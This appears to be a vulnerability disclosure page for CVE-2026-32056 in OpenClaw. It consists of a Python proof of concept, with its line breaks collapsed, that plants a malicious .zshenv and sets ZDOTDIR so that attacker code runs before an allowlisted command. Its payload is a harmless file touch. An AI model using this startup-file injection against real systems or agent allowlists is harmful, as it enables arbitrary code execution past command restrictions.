CVE-2026-32056 OpenClaw 远程代码执行漏洞

import os import subprocess # Simulate the vulnerable system.run function in OpenClaw def vulnerable_system_run(command): # The system checks the allowlist for the command print(f"[*] Allowlist check passed for command: {command}") # Vulnerability: The function calls a shell without sanitizing HOME/ZDOTDIR # Ideally, it should clean the environment or use a restricted shell shell = "/bin/zsh" # Assuming zsh for this example as it uses ZDOTDIR # Execute the command (in a real scenario, this spawns a subprocess) # The shell will load ZDOTDIR/.zshenv before running the command print(f"[*] Executing command via {shell}...") # os.system(command) # Actual execution def main(): print("[+] CVE-2026-32056 PoC: OpenClaw RCE via Shell Startup Env Injection") # 1. Setup malicious environment malicious_dir = "/tmp/evil_openclaw" if not os.path.exists(malicious_dir): os.makedirs(malicious_dir) # 2. Create malicious startup file payload_file = os.path.join(malicious_dir, ".zshenv") with open(payload_file, "w") as f: # This code runs BEFORE the allowlisted command f.write("echo 'Arbitrary Code Execution (ACE) achieved!'\n") f.write("touch /tmp/pwned_by_openclaw\n") print(f"[*] Created malicious payload at: {payload_file}") # 3. Exploit: Set the environment variable to point to the malicious directory # In a real attack, this would be done via the remote attack vector os.environ["ZDOTDIR"] = malicious_dir print(f"[*] Set ZDOTDIR to: {malicious_dir}") # 4. Trigger the vulnerability with a allowlisted command (e.g., 'ls') # The attacker calls system.run('ls') vulnerable_system_run("ls") print("[*] Check /tmp/pwned_by_openclaw for proof of execution") if __name__ == "__main__": main()